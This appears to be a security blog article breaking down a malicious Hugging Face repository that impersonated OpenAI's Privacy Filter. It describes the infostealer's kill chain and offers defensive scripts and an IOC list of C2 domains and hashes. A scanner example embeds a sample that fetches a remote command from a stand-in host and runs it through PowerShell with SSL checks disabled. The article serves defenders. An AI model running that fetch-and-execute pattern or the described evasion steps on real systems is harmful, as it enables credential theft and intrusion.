Fake OpenAI Privacy Filter Hits #1 on Hugging Face — Supply Chain Attack Breakdown
What Happened
On May 7, 2026, AI security firm HiddenLayer identified a malicious repository on Hugging Face called Open-OSS/privacy-filter. At the time of discovery, it had already reached the #1 trending position on the platform with approximately 244,000 downloads and 667 likes — all within 18 hours.
The repository was a near-perfect clone of OpenAI's legitimate openai/privacy-filter model, released in April 2026. OpenAI's Privacy Filter is a tool designed to detect and redact personally identifiable information (PII) from unstructured text — names, email addresses, phone numbers, physical addresses — making it useful for enterprise applications that need strong privacy protections built in.
The attacker copied OpenAI's model card verbatim, including links to OpenAI's official documentation PDF. The only difference in the README was a single instruction: instead of using the standard from_pretrained() method through the transformers library, it told users to clone the repository and run start.bat on Windows or python loader.py on Linux and Mac.
That single difference was the entire attack.
How the Attack Worked: The 6-Stage Kill Chain
Stage 1: The Lure
The typosquatted organization name — "Open-OSS" versus "openai" — was close enough that most developers wouldn't notice. Combined with the copied model card and inflated trending metrics, the repository looked completely legitimate at first glance.
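A lookalike organization name of this kind can be caught mechanically before anything is downloaded. The following is a minimal sketch, not a vetted control: the `TRUSTED_ORGS` allowlist, the `classify_org` helper, and the 0.6 similarity threshold are all assumptions introduced for illustration, and the exact-match check is deliberately case-sensitive so that any variant of a trusted name is treated as suspicious.

```python
import re
from difflib import SequenceMatcher

# Hypothetical allowlist: organizations you have verified yourself.
TRUSTED_ORGS = {"openai"}


def _normalize(name: str) -> str:
    """Lowercase and drop separators, so 'Open-OSS' becomes 'openoss'."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def classify_org(repo_id: str, threshold: float = 0.6) -> str:
    """Return 'trusted', 'lookalike', or 'unknown' for an 'org/model' repo id."""
    org = repo_id.split("/", 1)[0]
    if org in TRUSTED_ORGS:
        return "trusted"
    norm = _normalize(org)
    for trusted in TRUSTED_ORGS:
        # Similarity ratio between the normalized names (0.0 to 1.0).
        if SequenceMatcher(None, norm, _normalize(trusted)).ratio() >= threshold:
            return "lookalike"
    return "unknown"


for repo in ("openai/privacy-filter", "Open-OSS/privacy-filter"):
    print(repo, "->", classify_org(repo))
```

A string-similarity threshold is a blunt instrument: it will miss impersonations that do not resemble the trusted name, so the allowlist check matters more than the fuzzy match.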
Stage 2: Decoy Code in loader.py
The loader.py file wasn't obviously malicious. It contained a DummyModel class, fake training output, and synthetic dataset generation — all designed to produce convincing terminal output that made it look like a normal AI model was loading.
Behind the scenes, a function called _verify_checksum_integrity() ran silently. The name was deliberately chosen to look like a legitimate security check. In reality, it did the following:
- Disabled SSL verification
- Decoded a base64-encoded URL pointing to jsonkeeper.com, a public paste service
- Fetched a JSON document and extracted a "cmd" field
- Passed that command directly to PowerShell
Everything was wrapped in a try-except block — if it failed, it failed silently. The user would never know.
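The behaviors listed above leave textual traces that a reviewer can search for before running an unfamiliar loader script. The sketch below is a heuristic static scan under stated assumptions: the regular expressions, the `find_red_flags` helper, and the `SAMPLE` snippet (which points at example.com) are illustrative inventions, not the actual contents of loader.py, and a determined attacker can evade simple pattern matching.

```python
import base64
import re

# Heuristic patterns modeled on the behaviors described above (assumptions).
PATTERNS = {
    "ssl_verification_disabled": re.compile(
        r"verify\s*=\s*False|_create_unverified_context|CERT_NONE"
    ),
    "shell_or_powershell": re.compile(
        r"powershell|subprocess\.|os\.system", re.IGNORECASE
    ),
    "silent_except": re.compile(r"except(\s+Exception)?\s*:\s*\n\s*pass\b"),
}
# Quoted string literals that look like base64 (16+ characters).
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{16,}={0,2})["']""")


def find_red_flags(source: str) -> list[str]:
    """Return the names of suspicious patterns found in a script's source text."""
    flags = [name for name, pattern in PATTERNS.items() if pattern.search(source)]
    for match in B64_LITERAL.finditer(source):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 text, ignore
        if decoded.startswith(("http://", "https://")):
            flags.append(f"base64_url:{decoded}")
    return flags


# Hypothetical snippet imitating the described behavior; it is scanned, never executed.
_ENCODED = base64.b64encode(b"https://example.com/b").decode()
SAMPLE = f'''
def _verify_checksum_integrity():
    try:
        url = base64.b64decode("{_ENCODED}").decode()
        cmd = requests.get(url, verify=False).json()["cmd"]
        subprocess.run(["powershell", cmd])
    except Exception:
        pass
'''

print(find_red_flags(SAMPLE))
```

None of these patterns is malicious on its own. What deserves a manual read is the combination of a hidden URL, disabled certificate checks, a shell call, and swallowed errors inside something labeled as an integrity check.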
The use of jsonkeeper.com as a command-and-control (C2) relay was deliberate. The attacker could change the payload at any time by simply updating the paste. The repository itself never needed to be modified, keeping it clean on the surface.
Stage 3: Silent PowerShell Execution
The PowerShell command ran with execution policy bypass, a hidden window, and the CREATE_NO_WINDOW flag. There was no popup, no terminal flash, no visible indication that anything was happening. It downloaded update.bat from api.eth-fastscan.org — a domain designed to look like a blockchain analytics API.
Stage 4: update.bat — System Preparation
The batch file performed the following actions:
- Checked for admin rights. If unavailable, triggered a UAC prompt to self-elevate.
- Downloaded the payload executable with a random 8-character filename to make detection harder.
- Added Microsoft Defender exclusion paths so the malware directories would no longer be scanned.
- Created a scheduled task named "MicrosoftEdgeUpdateTaskCore" — designed to look like a legitimate Microsoft Edge browser update.
- The task was configured as one-shot: run once, then delete itself. No trace left in the task scheduler.
Stage 5: Defense Evasion
The payload attempted to disable Windows AMSI (Antimalware Scan Interface) and Event Tracing for Windows (ETW) to stop antivirus detection and logging. It also performed sandbox detection, checking for VirtualBox, VMware, Hyper-V, and Parallels. If any virtualization was detected, execution stopped — a deliberate measure to prevent security researchers from analyzing the malware in controlled environments.
Stage 6: Rust-Based Infostealer
The final payload was a 10 MB Rust-based infostealer that harvested:
- Browser data: Saved passwords and session cookies from all Chromium-based browsers and Firefox
- Discord: Authentication tokens and master keys
- Cryptocurrency: Wallet seed phrases, keystores, and browser wallet extension data
- FileZilla: FTP server credentials
- System information: Full host fingerprinting
All stolen data was packaged as JSON and exfiltrated to attacker-controlled infrastructure.
The Fake Trending Numbers
The 244,000 downloads and 667 likes were almost entirely artificial. HiddenLayer found that 657 out of 667 accounts that liked the repository matched predictable bot-naming patterns — "firstname-lastname" followed by random numbers, or "adjectivenoun" followed by four digits. None of these accounts had prior activity on the platform. The download numbers were likely inflated through the same automated processes.
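For scale, 657 of 667 likes is roughly 98.5% of the total. The two naming patterns described above can be approximated with regular expressions, as in the sketch below. The patterns and the example usernames are assumptions made for illustration; HiddenLayer's actual matching rules are not given here, and a regex cannot tell whether a word is really an adjective or a noun, so ordinary names such as a word followed by a year would also match.

```python
import re

# Approximations of the two naming patterns (assumptions, not HiddenLayer's rules).
BOT_PATTERNS = (
    re.compile(r"[a-z]+-[a-z]+\d+", re.IGNORECASE),  # firstname-lastname + digits
    re.compile(r"[a-z]+\d{4}", re.IGNORECASE),       # adjectivenoun + four digits
)


def looks_automated(username: str) -> bool:
    """True if the whole username fits one of the bot-like naming patterns."""
    return any(pattern.fullmatch(username) for pattern in BOT_PATTERNS)


def automated_share(usernames) -> float:
    """Fraction of usernames that fit a bot-like pattern (0.0 for an empty list)."""
    names = list(usernames)
    if not names:
        return 0.0
    return sum(looks_automated(name) for name in names) / len(names)


# Hypothetical usernames for illustration only.
likers = ["john-smith4821", "brightfalcon1234", "alice", "hf-team"]
print(automated_share(likers))
```

A name pattern is weak evidence by itself. In the reported case it was paired with a second signal: none of the accounts had prior activity on the platform.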
The attackers also promoted the repository on LinkedIn and Reddit, and performed SEO manipulation to ensure the fake repository would appear in search results for "OpenAI Privacy Filter."
Six More Malicious Repositories
This wasn't an isolated incident. HiddenLayer identified six additional repositories under a separate Hugging Face account called "anthfu", all uploaded on April 24, 2026. Each contained the same malicious loader.py logic and used the same command-retrieval URL (jsonkeeper.com/b/AVNNE). The six repos were:
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Merged-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
Notice the pattern — every single name impersonates a popular, in-demand AI model. Qwen3, DeepSeek, Bonsai, Claude — names that developers actively search for. This was a coordinated campaign targeting the AI developer community specifically.
Connection to Broader Supply Chain Operations
The api.eth-fastscan.org domain wasn't unique to this campaign. HiddenLayer observed the same domain serving a separate Windows executable that beaconed to welovechinatown.info, a command-and-control server previously documented in Panther's research into an npm typosquatting campaign. That campaign used a malicious npm package called "trevlo" — published by a user named "titaniumg" on April 4, 2026 — to distribute the WinOS 4.0 implant (also known as ValleyRAT). The trevlo package was downloaded over 2,300 times before removal.
The shared infrastructure suggests these campaigns are connected. The attack surface spans multiple ecosystems: npm, PyPI, and now Hugging Face. Whether it's a single group or connected groups, the operational pattern is the same — typosquat a trusted name, ship malware through the installation process, and steal credentials at scale.
The Bigger Problem: Cloning Open-Source Repos
This attack exposes a fundamental trust problem in open-source AI development.
Hugging Face operates like a GitHub for machine learning models. Anyone can create an organization, upload a model, write a model card, and start accumulating downloads. There is no identity verification for organizations, no mandatory code review for uploaded files, and the trending algorithm can be gamed with bot accounts.
But the problem goes deeper than one platform. The open-source AI ecosystem has several structural vulnerabilities that attackers are increasingly exploiting:
Pickle Deserialization: The Python pickle format, used by PyTorch and many other ML frameworks, allows arbitrary code execution during deserialization. Loading a model in pickle format is equivalent to running whatever code the model creator embedded in it. While Hugging Face uses a tool called Picklescan to detect malicious pickle files, researchers have repeatedly demonstrated ways to bypass it — including using broken pickle files, 7z compression instead of ZIP, and obfuscated payloads. The safer alternative, Safetensors, exists and prevents code execution entirely. But pickle remains dominant in practice because many developers prioritize convenience over security.
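To make the pickle risk concrete, the sketch below builds a harmless pickle whose `__reduce__` method asks the loader to call `print`, then lists the callables the pickle references without ever loading it, using the standard library's `pickletools.genops`. The `imported_globals` helper and the `Demo` class are hypothetical names for this illustration. This is a simplified view of what a scanner looks for, not how Picklescan is implemented, and the string tracking for `STACK_GLOBAL` is a heuristic that memoized or obfuscated pickles can defeat.

```python
import pickle
import pickletools


def imported_globals(data: bytes) -> list[str]:
    """List 'module.name' references a pickle would import, without loading it."""
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Older protocols carry "module name" as a single argument.
            found.append(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+ pushes module and name as the two preceding strings.
            found.append(f"{strings[-2]}.{strings[-1]}")
        if isinstance(arg, str):
            strings.append(arg)
    return found


class Demo:
    """Harmless stand-in: unpickling this object would call print(...)."""

    def __reduce__(self):
        return (print, ("code ran during unpickling",))


payload = pickle.dumps(Demo())
print(imported_globals(payload))
```

Calling `pickle.loads(payload)` would invoke `print` with the embedded message. An attacker substitutes a function that runs commands, which is why a plain data pickle should reference no callables at all.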
No Provenance Verification: When you download a model from Hugging Face, there is no cryptographic chain of trust linking the model to its original creator. A model card can say anything. An organization name can look like anything. There is no equivalent of package signing or verified publisher badges that meaningfully prevent impersonation.
Direct Execution Culture: The standard workflow for many AI developers is: find a model, clone the repository, run the loading script. The Open-OSS/privacy-filter attack exploited this exact workflow. The malicious instruction — "clone and run loader.py" — didn't look unusual because running scripts from cloned repositories is a normalized behavior in the ML community.
Enterprise Exposure: AI developers and data scientists frequently clone open-source models directly into corporate environments — machines with access to source code, cloud credentials, internal APIs, and production systems. A compromised model doesn't just affect one developer's laptop. It can become a beachhead into an entire organization's infrastructure.
This is a Pattern, Not an Incident
In the last few months alone, we've seen:
- LiteLLM/Mercor breach: A compromised Python package in the LiteLLM proxy led to the exposure of 4TB of data from Mercor, including recruiter emails, interview transcripts, and authentication tokens.
- PyTorch Lightning compromise (TeamPCP): A malicious version of the lightning package on PyPI that stole credentials upon installation.
- trevlo npm typosquat: A malicious npm package distributing WinOS 4.0/ValleyRAT through a postinstall hook.
- Open-OSS/privacy-filter + anthfu repos: Seven malicious Hugging Face repositories deploying a Rust-based infostealer.
The platform changes. The method changes. But the concept is the same every time: poison a trusted source, exploit developer trust, steal at scale. Supply chain attacks are becoming a pattern, not isolated incidents.
What You Should Do
If You Downloaded Open-OSS/privacy-filter
If you cloned the repository and executed start.bat, python loader.py, or any other file from it on a Windows machine, treat the system as fully compromised. Do not attempt to clean the machine — reimage it. The infostealer's scope makes partial remediation inadequate.
- Rotate every credential that was stored in browsers, password managers, or credential stores on that machine — saved passwords, session cookies, OAuth tokens, SSH keys, FTP credentials, and cloud provider tokens.
- Treat browser sessions as compromised even if passwords were not saved. Stolen session cookies can bypass MFA.
- Move cryptocurrency wallet funds to a new wallet generated on a clean device. Assume seed phrases, keystores, and wallet extension data have been stolen.
- Do not log into anything from the affected machine before reimaging.
For Everyone
- Verify the organization: Before downloading any model from Hugging Face, check the organization. Is it the official account? When was it created? Does it have other repositories with community activity? Is the community tab enabled? A disabled community tab prevents users from publicly flagging malicious content.
- Never run scripts blindly: If a model's README tells you to clone and run a script rather than using standard library methods like from_pretrained(), that's a red flag. Read the code first.
- Download from official repos only: Go to the original organization's account. Not forks, not copies, not similarly-named organizations.
- Prefer Safetensors over Pickle: When downloading PyTorch models, look for Safetensors format. It does not allow arbitrary code execution during deserialization. Avoid loading .pkl or .pt files from untrusted sources.
- Block known IOCs: Add the following to your blocklists: api.eth-fastscan.org, jsonkeeper.com/b/AVNNE, welovechinatown.info, recargapopular.com.
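Part of this checklist can be applied to a repository's file listing before anything is downloaded or run. The sketch below sorts filenames into Safetensors weights, weight formats that are commonly pickle-based, and executable scripts. The `triage_repo_files` helper and the suffix sets are assumptions for illustration: .pkl and .pt come from the advice above, while .pickle, .pth, .ckpt and the script extensions are added here as common cases and are not exhaustive.

```python
from pathlib import PurePosixPath

# Suffix sets are illustrative assumptions, not an exhaustive list.
PICKLE_SUFFIXES = {".pkl", ".pickle", ".pt", ".pth", ".ckpt"}
SCRIPT_SUFFIXES = {".py", ".bat", ".cmd", ".ps1", ".sh"}


def triage_repo_files(filenames) -> dict[str, list[str]]:
    """Group repository filenames by how much scrutiny they deserve."""
    report = {"safetensors": [], "pickle_based": [], "scripts": []}
    for name in filenames:
        suffix = PurePosixPath(name).suffix.lower()
        if suffix == ".safetensors":
            report["safetensors"].append(name)
        elif suffix in PICKLE_SUFFIXES:
            report["pickle_based"].append(name)
        elif suffix in SCRIPT_SUFFIXES:
            report["scripts"].append(name)
    return report


# Hypothetical listing resembling a repo that ships launcher scripts.
listing = ["model.safetensors", "config.json", "loader.py", "start.bat", "weights/model.pt"]
print(triage_repo_files(listing))
```

A repository whose README points at an entry in the scripts group, rather than at a standard library loading call, matches the red flag described above and should be read line by line before anything is executed.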
Indicators of Compromise (IOCs)
| Indicator | Type | Context |
|---|---|---|
| Open-OSS/privacy-filter | Hugging Face Repo | Primary malicious repository (removed) |
| anthfu/* | Hugging Face Account | Six additional malicious repositories |
| api.eth-fastscan.org | Domain (C2) | Payload delivery server |
| jsonkeeper.com/b/AVNNE | URL (C2 relay) | Command retrieval endpoint |
| welovechinatown.info | Domain (C2) | WinOS 4.0 / ValleyRAT C2 server |
| recargapopular.com | Domain (C2) | Data exfiltration endpoint |
| MicrosoftEdgeUpdateTaskCore | Scheduled Task | Persistence mechanism |
| 6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c | SHA-256 | Malicious loader.py (anthfu repos) |
| c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7 | SHA-256 | Secondary payload (o0q2l47f.exe) |
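The indicators in the table can be loaded into a small checker for proxy logs or file sweeps. The sketch below is one possible arrangement: the helper names (`url_matches_ioc`, `hash_matches_ioc`, `sha256_of_file`) are hypothetical, and the domains, URL, and hashes are copied from the table above. The jsonkeeper.com entry is matched by URL prefix only, because jsonkeeper.com itself is a public paste service rather than attacker infrastructure.

```python
import hashlib
from urllib.parse import urlparse

IOC_DOMAINS = {"api.eth-fastscan.org", "welovechinatown.info", "recargapopular.com"}
IOC_URL_PREFIXES = {"jsonkeeper.com/b/AVNNE"}
IOC_SHA256 = {
    "6d5b1b7b9b95f2074094632e3962dc21432c2b7dccfbbe2c7d61f724ffcfea7c",
    "c1b59cc25bdc1fe3f3ce8eda06d002dda7cb02dea8c29877b68d04cd089363c7",
}


def url_matches_ioc(url: str) -> bool:
    """True if the URL's host (or a subdomain) or its host+path matches an IOC."""
    parsed = urlparse(url if "//" in url else "//" + url)
    host = (parsed.hostname or "").lower()
    if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
        return True
    return any((host + parsed.path).startswith(p) for p in IOC_URL_PREFIXES)


def hash_matches_ioc(sha256_hex: str) -> bool:
    """True if a SHA-256 hex digest is one of the listed file hashes."""
    return sha256_hex.lower() in IOC_SHA256


def sha256_of_file(path: str) -> str:
    """Hash a file in 1 MiB chunks so large payloads do not fill memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


print(url_matches_ioc("https://jsonkeeper.com/b/AVNNE"))
```

To sweep a directory, pass each file's `sha256_of_file(path)` result to `hash_matches_ioc`. Hash matches only catch the exact files listed, and the payload reportedly used randomized filenames, so a clean sweep does not prove a machine is unaffected.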
Sources
- HiddenLayer Research — Malware Found in Trending Hugging Face Repository "Open-OSS/privacy-filter"
- The Hacker News — Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face
- Bleeping Computer — Fake OpenAI Repository on Hugging Face Pushes Infostealer Malware
- CSO Online — Malicious Hugging Face Model Masquerading as OpenAI Release
- Security Boulevard — Fake OpenAI Repository on Hugging Face Pushes Infostealer Malware
- Infosecurity Magazine — Malicious Hugging Face Repository Typosquats OpenAI